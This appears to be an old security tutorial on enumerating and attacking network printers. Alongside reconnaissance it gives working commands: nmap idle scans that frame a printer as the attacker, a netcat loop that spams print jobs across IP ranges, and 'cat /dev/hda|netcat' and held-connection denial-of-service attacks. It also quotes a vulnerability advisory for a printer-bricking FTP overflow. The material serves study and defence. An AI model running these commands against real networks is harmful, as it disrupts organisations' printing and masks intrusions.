If you try rsh on you Linux box it will likely try to use SSH automatically instead , which wo n't work .
If you have a Debian based distribution install rsh-client ( apt - get install rsh- client ) and try out some of these commands to gather more information from your Savin printer :
The Info command will list the printers current configuration and supported options " root@Irongeek : ~# rsh 192.168.1.2 info
( Input Tray )
No .
Name Page Size Status
-------------------------------------------------------------------------------
1 Tray 1 11 x 8 1/2 " PaperEnd .
2 Tray 2 11 x 8 1/2 " Normal .
3 LCT 11 x 8 1/2 " Normal .
4 Bypass Tray 11 x 8 1/2 " PaperEnd .
( Output Tray )
No .
Name Status
------------------------------------------------------------------------
1 Internal Tray 1 Normal .
2 Finisher Upper Tray Normal .
3 Finisher Shift Tray Normal .
( Printer Language )
No .
Name Version
--------------------------------------------------------
1 Automatic Language Switching 2.21.5.3
2 Customized PJL 2.21.5.3
3 RPCS 2c.9.5a
4 PCL 5e Emulation 1.01
5 PCL XL Emulation 1.01
6 Adobe PostScript 3 1.02
Stats gives you system stats ( duh ) : root@Irongeek :~# rsh 192.168.1.2 stat
Printer status : Printing .( Ready . )
Online / Offline : Online .
Rank Owner Job Files Total Size
active anonymous 2491 ( standard input ) 126980 bytes
The syslog command will return information such as the version , wins server of the network , what daemons were started and other bits of info : root@Irongeek : ~# rsh 192.168.1.2 syslog
# [ncsd ( 17) ]06/02/24 07:16:18 RICOH
Aficio 2045e 2.40 INFO :
# [ncsd ( 17) ]06/02/24 07:16:18 Network Control Service 4.12 INFO :
# [ncsd ( 17) ]06/02/24 07:16:18 Copyright ( C ) 1994-2002 RICOH CO . , LTD .
INFO :
# [ncsd ( 17) ]06/02/24 07:16:19 Ethernet started with IP : 192.168.1.2 INFO :
# [inetd ( 42) ]06/02/24 07:16:19 inetd start .
INFO :
#[snmpd ( 43) ]06/02/24 07:16:19 Snmpd Start .
INFO :
# [ httpd ( 44) ]06/02/24 07:16:19 httpd start .
INFO :
# [ncsd ( 17) ]06/02/24 07:16:19 Current Interface Speed : 100 Mbps ( full - duplex ) INFO :
# [nbtd( 45) ]06/02/24 07:16:19 nbtd start .
INFO :
# [nbtd( 45) ]06/02/24 07:16:19
Name registration success .
WINS Server=192.168.30.100 NetBIOS Name=RNP82398B ( Ethernet ) INFO :
# [nbtd( 45) ]06/02/24 07:16:19
Name registration success .
WINS Server=192.168.30.100 NetBIOS Name=IGPrinter ( Ethernet ) INFO :
# [nbtd( 45) ]06/02/24 07:16:19
Name registration success .
WINS Server=192.168.30.100 NetBIOS Name=WORKGROUP
( Ethernet ) INFO :
#[multid( 48) ]06/02/24 07:16:21 multid start .
INFO :
#[diprintd ( 51) ]06/02/24 07:16:21 started .
INFO :
# [lpd ( 52) ]06/02/24 07:16:21 restarted INFO :
#[snmpd ( 43) ]06/02/24 07:16:28
Snmp over ip is ready .
INFO :
# [ httpd ( 44) ]06/02/24 07:16:28 ipp enable .
INFO :
# [ httpd ( 44) ]06/02/24 07:16:28 nrs disable .
INFO :
# [lpd ( 52) ]06/03/06 22:19:28 bad request ( 71 ) from WARNING :
# [lpd ( 52) ]06/03/06 22:19:28
Illegal service request ERR :
# [lpd ( 52) ]06/03/06 22:19:28
Lost connection ERR :
# [rshd ( 2570 ) ]06/03/06 22:19:33 192.168.19.56 can't connect second port : 65360 INFO :
# [rshd ( 2596 ) ]06/03/06 22:50:32 ( 192.168.19.56 ) help : Command not supported .
ERR : Prnlog give you more information on recently print documents : root@Irongeek : ~# rsh 192.168.1.2 prnlog
ID User Page Result Time
--------------------------------------------------------
2472 2 Finished 06/03/06 21:29
2473 10 Finished 06/03/06 21:33
2474 1 Finished 06/03/06 21:58
2475 19 Finished 06/03/06 21:59
2476 3 Finished 06/03/06 22:16
2477 4 Finished 06/03/06 22:16
2478 2 Finished 06/03/06 22:17
2479 4 Finished 06/03/06 22:19
2480 5 Finished 06/03/06 22:22
2481 3 Finished 06/03/06 22:24
2482 2 Finished 06/03/06 22:29
2483 2 Finished 06/03/06 22:35
2484 1 Finished 06/03/06 22:37
2485 2 Finished 06/03/06 22:38
2486 2 Finished 06/03/06 22:38
2487 2 Finished 06/03/06 22:40
2488 6 Finished 06/03/06 22:40
2489 2 Finished 06/03/06 22:45
2490 4 Finished 06/03/06 22:52
2491 30 Finished 06/03/06 22:53
Ps will list the currently running processes : root@Irongeek : ~# rsh 192.168.1.2 ps
pid=2605 [ rshd ]
pid= 57 [ pcl ]
pid= 55 [ rsp ]
pid= 52 [ lpd ]
pid= 51 [ diprintd ]
pid= 49 [ centrod ]
pid= 48 [ multid ]
pid= 47 [ gps-web ]
pid= 46 [ gps- pm ]
pid= 45 [ nbtd ]
pid= 44 [ httpd ]
pid= 43 [ snmpd ]
pid= 42 [ inetd ]
pid= 41 [ mcsc ]
pid= 40 [ meu ]
pid= 38 [ plotter_sa ]
pid= 36 [ shmlog ]
pid= 35 [ copy ]
pid= 34 [ gps ]
pid= 33 [ scan ]
pid= 32 [ nfa ]
pid= 31 [ wdb ]
pid= 30 [ pts ]
pid= 29 [ websys ]
pid= 23 [ nrs ]
pid= 21 [ dcs ]
pid= 19 [ ous ]
pid= 18 [ ucs ]
pid= 17 [ ncsd ]
pid= 16 [ ecs ]
pid= 15 [ mcs ]
pid= 14 [ fcuh ]
pid= 13 [ scs ]
pid= 12 [ imh ]
pid= 3 [ checker ]
pid= 2 [ pagedaemon ]
pid= 1 [ init ]
pid= 0 [ swapper ]
The the print command prints whatever you tell it to on a sheet of paper ( in this case just the word " test " ) : root@Irongeek : ~# rsh 192.168.1.2 print
test
root@Irongeek :~#
Also try " rsh ip - address reboot " to see if you can reset the printer remotely ( check syslog to see if it worked .
Much the same information can be obtain by downloading files from the Savin printer 's built in FTP server and reading them in a text editor .
See the screen shot below :
Controlling and finding JetDirect boxes with JetAdmin
A nice tool Hewlett - Packard puts out for controlling JetDirect boxes is JetAdmin .
Currently HP only offers a web version of the software , called appropriately enough Web JetAdmin , with versions for both Windows and Linux .
Unfortunately you have to register on HP 's site to get it , but you can download it without registering from this mirror site :
http://www.svrops.com/svrops/dwnldprog.htm
Personally I prefer the older HP JetAdmin for Window 2000 ( v3.42 , the last version to be released before it was discontinued but still works fine with XP ) as it seems quicker and less bloated ; however it may be missing some of the features of the newer Web JetAdmin .
You can download the desktop version from :
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
JetAdmin is very fast at finding JetDirect boxes on your subnet since it does an SNMP broadcast to the network to locate them .
Just right click and choose " Properties " to find more information about the JetDirect box , or choose " Modify " to bring up a wizard that lets you change the description , IP settings and other variables associated with the printer .
JetAdmin can also generate reports about the network printers it finds .
JetAdmin can do too many things for me to describe them all in details here so go download it and try it out .
As a side note , if you want to find boxes on a network running Web JetAdmin , do a ports scan for 8000 / tcp ( HTTP ) and 8443/tcp ( HTTPS ) ; if it 's password is weak or non-existent it 's an easy way to control a network 's printers .
If you are interested in a JetAdmin like tool for the Ricoh Savin printers look into SmartDeviceMonitor .
Finding Network printers using Nmap and SNMP tools
Using Nmap from your Linux ( preferable ) or Windows box makes finding JetDirects and other network printers pretty easy .
The Nmap commands I will be showing in this section are very simple and not very stealthy so you may want to consult the Nmap MAN page or a good Nmap tutorial for more ideas .
You could use a simple Nmap command like :
nmap - A 192.168.1 .*
to scan the range 192.168.1.1-255 for common ports and do an OS and version detect on the systems it finds .
The output of the above command would look something like the following :
Irongeek : ~# nmap - A 192.168.1 .*
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 15:12 EDT
Interesting ports on igprinter ( 192.168.1.93 ) :
( The 1656 ports scanned but not shown below are in state : closed )
PORT STATE SERVICE VERSION
21/tcp open ftp HP JetDirect ftpd
23/tcp open telnet ?
80 /tcp open http HP Jetdirect httpd
280 /tcp open http HP Jetdirect httpd
515 /tcp open sdmsvc LANDesk Software Distribution ( sdmsvc.exe )
631/tcp open http HP Jetdirect httpd
9100 / tcp open jetdirect ?
Device type : printer|print server
Running : HP embedded
OS details : HP LaserJet printer / print server
Nmap finished : 1 IP address ( 1 host up ) scanned in 120.963 seconds
Irongeek : ~#
There 's one problem with the simple command shown above .
If you are using a version of Nmap before 3.90 on some network printers it will create garbage print jobs with text like :
GET / HTTP/1.0
OPTIONS / HTTP/1.0
OPTIONS / RTSP/1.0
on each of the sheets printed , wasting a lot of paper .
This happens because as Nmap scans for version detection on port 9100 / tcp it sends some of the probe requests from the nmap - service - probes file to figure out what service is running on port 9100 / tcp .
Since the JetDirect box does not understand what it 's being sent it just prints out the probes and you wind up with a bunch of garbage printed out .
The easiest way to fix this is to upgrade to Nmap 3.90 or better , but barring that , there is a workaround .
A better and faster solution might be to only probe for common network printer ports other than 9100 ( Note :
You may want to leave off - T insane for stealth / bandwidth reasons ) :
nmap - A -p 21,23,80,280,515,631 192.168.1. * - T insane
or maybe not use the - A ( which is like doing a - sV - sO together ) option at all and just use - sO to detect the OS that 's running , but not send probes to the ports to find out the service versions are running .
While we are at it , it might be interesting to run a UDP scan on the JetDirect box as well .
Irongeek : ~# nmap -sU 192.168.1 . *
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-11 06:21 EDT
Interesting ports on 192.168.1.93 :
( The 1474 ports scanned but not shown below are in state : closed )
PORT STATE SERVICE
137/udp open|filtered netbios-ns
161 / udp open|filtered snmp
427 /udp open|filtered svrloc
32768 /udp open|filtered omad
MAC Address : 00:60 : B0:6D:47:C6 ( Hewlett - packard CO . )
Nmap finished : 1 IP address ( 1 host up ) scanned in 86.238 seconds
Irongeek : ~#
As you can see we found quite a few ports to look into .
I 'll go over some of the things you can do with them in a bit .
By the way , you may notice the NMB port 137 / udb is open , which means you may be able to find printers on the LAN via the NetBIOS name service .
By the way , to find Ricoh Savins on the network you could use an Nmap command something like the following :
Irongeek : /# nmap - A 192.168.1.3 - T insane
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-09 23:49 EDT
Interesting ports on 192.168.1.3 :
( The 1656 ports scanned but not shown below are in state : closed )
PORT STATE SERVICE VERSION
21/tcp open ftp
23/tcp open telnet ?
80 /tcp open http ?
514/tcp open shell ?
515 /tcp open printer lpd ( error : Illegal service request )
631/tcp open ipp ?
9100 / tcp open jetdirect ?
5 services unrecognized despite returning data .
If you know the service / version , please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT
SERVICE FINGERPRINT
( SUBMIT INDIVIDUALLY )==============
... Omitted for security and space reasons ...
MAC Address : 00:00:74:80:7C:B8 ( Ricoh Company )
Device type : general purpose
Running : NetBSD
OS details : NetBSD 1.3I through 1.6
Uptime 6.506 days ( since Sat Sep 3 11:42:37 2005 )
Nmap finished : 1 IP address ( 1 host up ) scanned in 94.690 seconds
Irongeek :/#
Notice that the Ricoh Savins have a lot of the same ports open as the HP JetDirects , but that the the OS is detected as NetBSD ( it will even run on your toaster ) .
Since many network printers respond to SNMP another great way to find them is to use an SNMP service scanning tool .
Ricoh puts out a good tool for finding and configuring many network printers called SmartDeviceMonitor .
SmartDeviceMonitor seems to miss some network printers that are n't Savins , but if you use Richo Savin Aficio printers on your network its a great tool for locating and polling them .
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20 Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone 's SNScan in another good choice :
http://www.foundstone.com/resources/proddesc/snscan.htm
or Softperfect 's NetScan if you turn on the SNMP search options :
http://www.softperfect.com/products/networkscanner/
Another third way you could find network printers ( if you are on the same subnet ) is to use Nmap or Cain to do an ARP sweep and look for and boxes with a MAC address belonging to Hewlett Packard , Ricoh or another printer vendor .
These are likely network printers .
Finding Printers with Google
Sometimes for convenience admins will put links to there printers ' web interfaces on an Intranet site so they can easily admin them or pull off stored documents .
Well , sometimes an Intranet is not really just an Intranet but accessible via the Internet .
Google is a great way to find these printers .
Here are a few search strings that may be of interest :
Ricoh Savins
( Since these printer frequently store documents where to can be downloaded this can be a real killer for security )
intitle : " web image monitor "
" /web/user/en/websys/webArch/mainFrame.cgi"
inurl : "/en/sts_index.cgi "
HP Jetdirects ( Varies greatly from model to model )
inurl : hp/device / this.LCDispatcher
CUPS Connected Printers
inurl : " :631/ printers " - php - demo
Try combining the above with the Google " site : " parameter to restrict the search to just certain organizations .
For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful Google search strings for " Printers " .
I obtained some of the above search strings from Johnny 's site .
Finding info about the printer using SNMP tools
Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about a network , assuming no firewalls are blocking the SNMP port ( 161/udp ) .
The greatly truncated output below should give you some idea as to the kind of information you can get using snmpwalk , including other hosts on the same network , their IPs and MAC addresses and the features of the printer along with it 's firmware revision .
If you are using a Debian based distribution on Linux try the " apt - get install snmp " command to get these tools .
root@Cthulhu :~# snmpwalk -v 1 -c public 192.168.1.2 SNMPv2-MIB::sysDescr.0 = STRING : HP ETHERNET MULTI -ENVIRONMENT , ROM
H_06_01 , JETDIRECT
EX , JD34 , EEPROM H.08.49
SNMPv2-MIB::sysObjectID.0 = OID : SNMPv2-SMI::enterprises.11.2.3.9.1
SNMPv2-MIB::sysUpTime.0 = Timeticks : ( 1358074910 ) 157 days , 4:25:49.10
SNMPv2-MIB::sysContact.0 = STRING :
SNMPv2-MIB::sysName.0 = STRING : NPI6D47C6
SNMPv2-MIB::sysLocation.0 = STRING :
SNMPv2-MIB::sysServices.0 = INTEGER : 64
IF -MIB::ifNumber.0 = INTEGER : 1
IF -MIB ::ifIndex.1 = INTEGER : 1
IF -MIB ::ifDescr.1 = STRING : HP ETHERNET MULTI -ENVIRONMENT , ROM
H_06_01 , JETDIRECT
EX , JD34 , EEPROM H.08.49
IF -MIB::ifType.1 = INTEGER : ethernetCsmacd( 6 )
... Omitted for security and space reasons ...
IF -MIB::ifOutQLen.1 = Gauge32 : 0
IF -MIB::ifSpecific.1 = OID : SNMPv2-SMI::zeroDotZero.0
RFC1213-MIB ::atIfIndex .1.1.192.168.19.16 = INTEGER : 1
... Omitted for security and space reasons ...
RFC1213-MIB ::atIfIndex .1.1.192.168.31.254 = INTEGER : 1
RFC1213-MIB ::atIfIndex .1.1.24.0.1.60 = INTEGER : 1
RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex - STRING : 00 0A 95 A6 6C 00
... Omitted for security and space reasons ...
RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex -STRING : 00 0 F 34 E8 DC 38
RFC1213-MIB::atPhysAddress.1.1.24.0.1.60 = Hex - STRING : 01 00 5E 00 01 3C
RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address : 95:A0:13:10
... Omitted for security and space reasons ...
RFC1213-MIB::atNetAddress.1.1.192.168.31.254 = Network Address : 95:A0:1F:FE
RFC1213-MIB::atNetAddress.1.1.24.0.1.60 = Network Address : E0:00:01:3C
IP -MIB::ipForwarding.0 = INTEGER : notForwarding ( 2 )
I ... Omitted for security and space reasons ...
IP -MIB::ipAdEntAddr.192.168.1.2 = IpAddress : 192.168.1.2
... Omitted for security and space reasons ...
IP -MIB::ipNetToMediaIfIndex.1.192.168.19.16 = INTEGER : 1
I ... Omitted for security and space reasons ...
IP -MIB::ipNetToMediaIfIndex.1.192.168.31.254 = INTEGER : 1
IP -MIB::ipNetToMediaIfIndex.1.24.0.1.60 = INTEGER : 1
IP -MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING : 0:a:95:a6:6c:0
... Omitted for security and space reasons ...
IP -MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING : 0:f:34:e8:dc:38
... Omitted for security and space reasons ...
IP -MIB::ipNetToMediaNetAddress.1.192.168.31.254 = IpAddress : 192.168.31.254
... Omitted for security and space reasons ...
IP -MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER : dynamic( 3 )
IP -MIB::ipNetToMediaType.1.24.0.1.60 = INTEGER : dynamic( 3 )
IP -MIB::ipRoutingDiscards.0 = Counter32 : 2801
... Omitted for security and space reasons ...
IP -MIB::icmpOutAddrMaskReps.0 = Counter32 : 0
TCP-MIB::tcpRtoAlgorithm.0 = INTEGER : vanj ( 4 )
TCP-MIB::tcpRtoMin.0 = INTEGER : 10 milliseconds
TCP-MIB::tcpRtoMax.0 = INTEGER : 120000 milliseconds
... Omitted for security and space reasons ...
TCP-MIB::tcpRetransSegs.0 = Counter32 : 20
TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER : listen ( 2 )
TCP-MIB::tcpConnLocalAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress : 192.168.1.2
TCP-MIB::tcpConnLocalPort.192.168.1.2.21.0.0.0.0.0 = INTEGER : 21
TCP-MIB::tcpConnRemAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress : 0.0.0.0
TCP-MIB::tcpConnRemPort.192.168.1.2.21.0.0.0.0.0 = INTEGER : 0
TCP-MIB::tcpInErrs.0 = Counter32 : 0
TCP-MIB::tcpOutRsts.0 = Counter32 : 17832
UDP-MIB::udpInDatagrams.0 = Counter32 : 8374653
UDP -MIB::udpNoPorts.0 = Counter32 : 8135924
UDP -MIB::udpInErrors.0 = Counter32 : 22054
UDP-MIB::udpOutDatagrams.0 = Counter32 : 363574
UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress : 0.0.0.0
UDP -MIB::udpLocalPort.0.0.0.0.68 = INTEGER : 68
UDP-MIB::udpLocalAddress.192.168.1.2.137 = IpAddress : 192.168.1.2
The above command works well on Jetdirects , Richo Savins and other common network printers that support SNMP .
If you do n't know the proper SNMP community name a quick sniff of the network with Ettercap or Dsniff should revel it to you iif the admin is using using SNMP version 1 or 2 .
Most times the community name will just be the default " public " .
Using a JetDirect box as an Nmap Idlescan Zombie
While I'm on the topic of Nmap and JetDirect boxes , they make great bouncers for stealth Idle scans ( also know as Zombie scans ) since their IPIDs are incremental .
Basically what happen is the Nmap scan is bounced off of the JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker .
There are a few problems with these kinds of scans , the biggest being that they are VERY slow .
For more details on Idle scans see the following URL :
and the Nmap MAN page :
- sI < zombie host [ : probeport ] >
Idlescan :
This advanced scan method allows for a truly blind TCP port scan of the target ( meaning no packets are sent to the target from your real IP address ) .
Instead , a unique side - channel attack exploits predictable " IP frag - mentation ID " sequence generation on the zombie host to glean information about the open ports on the target .
IDS systems will display the scan as coming from the zombie machine you specify ( which must be up and meet certain criteria ) .
I wrote an informal paper about this technique at http://www.inse- cure.org/nmap/idlescan.html .
Besides being extraordinarily stealthy ( due to its blind nature ) , this scan type permits mapping out IP - based trust relationships between machines .
The port listing shows open ports from the perspective of the zombie host .
So you can try scanning a target using various zombies that you think might be trusted ( via router / packet filter rules ) .
Obviously this is crucial information when prioritizing attack targets .
Otherwise , you penetration testers might have to expend considerable resources " owning " an intermediate system , only to find out that its IP is n't even trusted by the target host / network you are ultimately after .
You can add a colon followed by a port number if you wish to probe a particular port on the zombie host for IPID changes .
Otherwise Nmap will use the port it uses by default for " tcp pings " .
Here is an example of Nmap being run using a JetDirect box as a bouncer .
I 've used the - P0 option so that the host running Nmap does not ping the target first , lessening the stealth value by giving away the scanners true IP .
Irongeek : ~# nmap - P0 -sI 192.168.1.93 Irongeek.irongeek.com
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDT
Idlescan using zombie 192.168.1.93 ( 192.168.1.93:80 ) ; Class : Incremental
Interesting ports on 192.168.1.5 :
( The 1654 ports scanned but not shown below are in state : closed|filtered )
PORT STATE SERVICE
22/tcp open ssh
25 /tcp open smtp
80 /tcp open http
110 /tcp open pop3
111/tcp open rpcbind
139 /tcp open netbios - ssn
443/tcp open https
445/tcp open microsoft-ds
587/tcp open submission
Nmap finished : 1 IP address ( 1 host up ) scanned in 35.262 seconds
Irongeek : ~#
Now , if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 ( the JetDirect box ) was doing the scan .
Sneaky !
Setting up a direct IP printer in Windows and Linux
Setting up a direct IP printer can be useful from time to time ; here are a few reasons why you might want to set up one up :
1 . Your main print server is unreliable .
2. Sometimes cutting out the middle man make a print job work when normally it would not .
Some PDFs used to give me fits when I used a Window 2000 server to host print shares , but printing directly to the IP printer worked like a charm .
3 . To bypass access rights to a printer or to get around print tracking software like Pharos Uniprint or Equitrac .
Rather then waste space on how to set up direct IP printing in Windows I 'll point you to Microsoft 's howto :
http://www.microsoft.com/technet/prodtechnol/windowsserver2003/
library / ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx
and HP's :
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391
If you wish to script the installation in Windows check out :
https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320
For you Linux users it 's pretty easy to set up a direct IP printer too .
Make sure you have CUPS ( Common Unix Printing System ) installed ( for us Debian folks : apt - get install cupsys ) .
Most Linux distributions have a GUI setup wizard now , but you can also add a direct IP printer from the shell by using a command like the following :
foomatic - configure -s cups -n My - Remote - JetDirect -c socket ://192.168.1.2:9100 /
Of course , you will want to change the IP and maybe the name to reflect your network and printer setup .
If for some reason
http://192.168.4.2:631/printer
http://192.168.4.2:631/ipp
Spamming Printers
I 'm rather surprised with the amount of E- mail , Net Message and Fax spam that know one seems to have tried Printer Spam .
First , the attacker would need to have something to iterate though printers .
I wrote a quick tool for Linux and Windows call IPIterator that does just this :
http://www.irongeek.com/i.php?page=security/ipiterator
The following example assumes that port 9100 / tcp is open past the firewall ( do n't laugh , I 've seen it ) , but with some motification I 'm pretty sure it could be made to work with IPP and FTP enabled printers too .
All one has to do is generate a PostScript or PCL file with the content they want to send it the spam message .
The Windows " Printer to File " option works well for this .
In a pinch a plain old text file will also work .
Then they can use Netcat and IPIterator to send the print job to a whole IP range of printers .
Irongeek@Irongeek :~# ./ipiterator 192.168.3.1-5,25 , " cat spam.prn|netcat -q 0 ~ ip 9100 "
cat spam.prn|netcat -q 0 192.168.3.1 9100
Starting thread 1
cat spam.prn|netcat -q 0 192.168.3.2 9100
Starting thread 2
cat spam.prn|netcat -q 0 192.168.3.3 9100
Starting thread 3
cat spam.prn|netcat -q 0 192.168.3.4 9100
Starting thread 4
cat spam.prn|netcat -q 0 192.168.3.5 9100
Starting thread 5
DONE
Irongeek@Irongeek :~#
Evil I know , maybe I should not have mentioned it as now it may become more common .
This facility might also be legitimately useful for sending out mass messages on a network where your work .
Side note on a Pharos Uniprint vulnerability
While this is not directly related to the article 's main topic I thought that some of you would be interested in knowing about a vulnerability with the Pharos Uniprint system .
It looks like Pharos Uniprint saves the last print jobs sent to a printer into C : \Program Files \Pharos \Temp\PORT*.PRN as a simple PCL print job which is readable by everyone on the Windows box by default .
With a quick NetCat command ( seen later in this article in the sniffing and replay section ) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that Windows workstation .
Not very secure huh ?
It seems that Pharos did fix this in later versions , as Edward Burhenn stated in his email to me :
This was a " bug " in an older version of Pharos for which a hot fix was released :
The application of Pharos 7.0 Hot Fix 1 ensures that no more spool file copies will be retained after print jobs for both Popups and non-Popups printers .
Existing copies of old spool files in the ... \ Pharos \Temp folder will need to be deleted manually .
To avoid any further confusion could you post an update to the article , perhaps directing folk to the hot fix which can be downloaded from our website :
http://www.pharos.com/Support/index.html?
Thanks ,
Ed
Edward Burhenn
Technical Specialist
DoSing the network or the printer
As should be obvious by now for those that have been paying attention , it 's pretty trivial to cause a DoS ( Denial of Service ) attack with a JetDirect box that 's not password protected .
A deviant user could just use the telnet or web interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion .
Another option for network mayhem would be to set the host name of the JetDirect box to that of another box on the network .
This would mess a few things up if the facility uses dynamic DNS for host names .
Also notice form the UDP port scan show earlier that the JetDirect box is running the NetBIOS naming service , so changing the host name on a Windows network could cause name resolution problems .
As for DoSing the printer , if someone wanted to be a dick they could just hop onto their * nix box and cat their hard drive to the printer , causing a print job the size of the local hard drive :
cat /dev/hda|netcat -q 0 192.168.1.2 9100
Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print jobs .
Another thing that could be done is to upload a corrupted firmware to the JetDirect box .
This can be done by obtaining the HP Download Manager from :
http://www.hp.com/go/dlm_sw
and then attempting an upgrade of the firmware , but stopping the process halfway though .
The JetDirect will be non responsive until a full firmware is uploaded again .
An interesting side note , you can upgrade the firmware on a JetDirect even if you do n't know the JetDirect 's system password .
Why HP did not require a password for a firmware update I have no idea ; it just seems like common sense that they would .
From reading Slobotron 's article ( linked at the bottom ) it would seem you can also upgrade the firmware with Netcat .
On a lark I decided to test out the effects of connect to port 9100 / tcp and holding the connection using the Telnet command .
I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x ( J3263A ) and the result was that the connection to port 9100 / tcp seems to be single threaded .
While I held the Telnet connection to port 9100 no other print jobs could be sent to the printer !
The connection should timeout after awhile .
Imagine if someone used an active connection on the LAN and a command like :
./ipiterator 192.168.1.*,25 , " telnet ~ip 9100 "
to knock out printing to a whole LAN !
See the section above for more info on IPIterator .
Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service exploits .
I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks .
One of the more interesting attacks to be found recently ( 12/19/2006 ) comes form researcher Joxean Koret .
I 've got to thank the Pauldotcom pod cast ( episode 55 ) for pointing it out to me .
It seems that Mr. Koret found a flaw in some HP Jetdirect 's that permanently bricks the printer server to the point it has to be sent back to HP to be fixed .
For those that do n't understand the term " brick " it means that the device has be made inoperatable because of a bad firmware or an electrical problem .
This is a serious flaw since it effectively turns the JetDirect into a paperweight .
In Joxean Koret 's words :
HP FTP Printer Server Denial Of Service
---------------------------------------
Author : Joxean Koret
Date : 2006
Location : Basque Country
Affected Software
-----------------
Vendor : Hewlett Packard
Description : HP Printers FTP Server Denial Of Service
Description
-----------
A problem exists in almost any currently used HP Printer with the FTP
Print Server .
Version 2.4 of the FTP Print Server will crash with only one shoot .
Version 2.4.5 , which is latest , will need various shoots ( the number of
shoots needed is currently unknow ) .
While playing with my own FTP Fuzzer I tried finding flaws in HP's
Printers .
After trying with 5 printers I found the problem in all of
these .
The problem is a buffer overflow in the LIST and NLST command .
In
version 2.4 a single shoot sending a LIST command with a long string
( about 256 characters ) is sufficient enough to test the vulnerability .
Take care trying it because two of my printers were crashed completely
( you will need to make use of your warranty ; ] ) .
Against 2.4 versions
it can crash the complete printer and be unresponsive even after
rebooting it .
In version 2.4.5 ( which is the latest ) you need to send various times
long shoots to the parameter LIST ( a single shoot will not crash ,
printer will answer with a " Path too long " message ) .
You will need to
send various times a LIST command with long strings .
When trying with
other commands you will see that no problem is raised and the printer
will always be responsive .
After a successfull attack you may completely
crash your printer ( i.e. , calling technical support to fix your crashed
printer ) .
The problem can be easily triggered by using any FTP fuzzing tool .
You
can crash your printer in about 10 second (s ) in a LAN .
The printer models I used in my tests are :
* HP LaserJet 5000 Series ( firmware R.25.15 / R.25.47 )
* HP LaserJet 5100 Series ( firmware V.29.12 )
Attached goes POCs for the vulnerabilities .
Workaround
----------
Disable the FTP print server as , surely , you are n't using it .
Disclaimer
----------
The information in this advisory and any of its demonstrations is
provided " as is " without any warranty of any kind .
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory .
Contact
-------
Joxean Koret < joxeankoret [ at ] yah00 [ D0T ] es >
--
-----------------------------------
Agian , agian , egun batez
jeikiko dira egiazko Ziberotarrak ,
egiazko euskaldunak ,
tirano arrotzen hiltzeko
eta gure aiten aitek utzi daikien
lurraren populiari erremetitzeko .
-----------------------------------
It is not yet know which JetDirect print servers are effected by this exploit as few people want to take the chance of destroying their own .
I 've mirrored his two proof of concept scripts if anyone would like to test them and let me know which JetDirects it works on :
jd-dos2.4.5.py
jd-dos2.4.py
MITRE lists this bug as CVE - 2006 - 6742 .
The buffer overflow in the LIST an NLST commands seem to overwrite part of the firmware so my best guess is that cheaper print servers without flash memory like the 170x are probably safe .
From what I 'm hearing HP is not taking this threat as seriously as they should given that someone could cripple printing for days at a corporation using this exploit and a tool like IPIterator .
The only know fix as of yet is a preventative one , and that is to turn off the JetDirect 's FTP service or to block port 21 / TCP at the border of the network the print server is on .
If anyone has more information on this flaw please email me .
See : http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability .
By the way , do n't be the kind of person that would use one of the above techniques , I only mention them so that admins know what they need to guard against .
Update
01/20/2007 : Looks like HP may have fixed this issue with a newer firmware :
http://www.securitytracker.com/alerts/2007/Jan/1017532.html
Still , if anyone has more information please email me .
Changing the LCD display text using HPhack , IGhphack or Hijetter
This is an old hack ( 1997 ) and does not accomplish much , but it is fun !
Silicosis of L0 pht ( sili@l0pht.com ) wrote the original exploit code for * nix systems and someone else ported it to NT / 2000 / XP based systems .
Although it 's been out there for a long time , it still works on every HP printer / JetDirect box I have seen .
What the HP display hack allows you to do is set the text that displays on the little LCD panel of an HP printer .
It accomplishes this over the network by sending packets to a JetDirect box hooked to the printer ( or built into it ) .
The first thing you need to do is find out the IP or hostname of the JetDirect box that services the printer .
You can do this in one of at least three ways .
The first way is by hitting the little test button on the JetDirect box that 's connected to the printer .
If the JetDirect card is built in you may have to go through the menus and choose " Print Configuration " .
Another way is to go into your " Printers and Faxs " settings , right click and bring up the properties of the printer in question , and look under the Ports tab for the hostname ( npi******) .
Once you have this information it 's easy to run Silicosis ' little hack .
To run it from Windows just use the following syntax : hpnt Hostname Message
Windows Example :
C:\> hpnt npi769e71 " Irongeek "
HP Display hack -- sili@l0pht.com
Hostname : npi769e71
Message : Irongeek
Connecting ....
Sent 54 bytes
C:\> hpnt 192.168.1.14 " Irongeek Also "
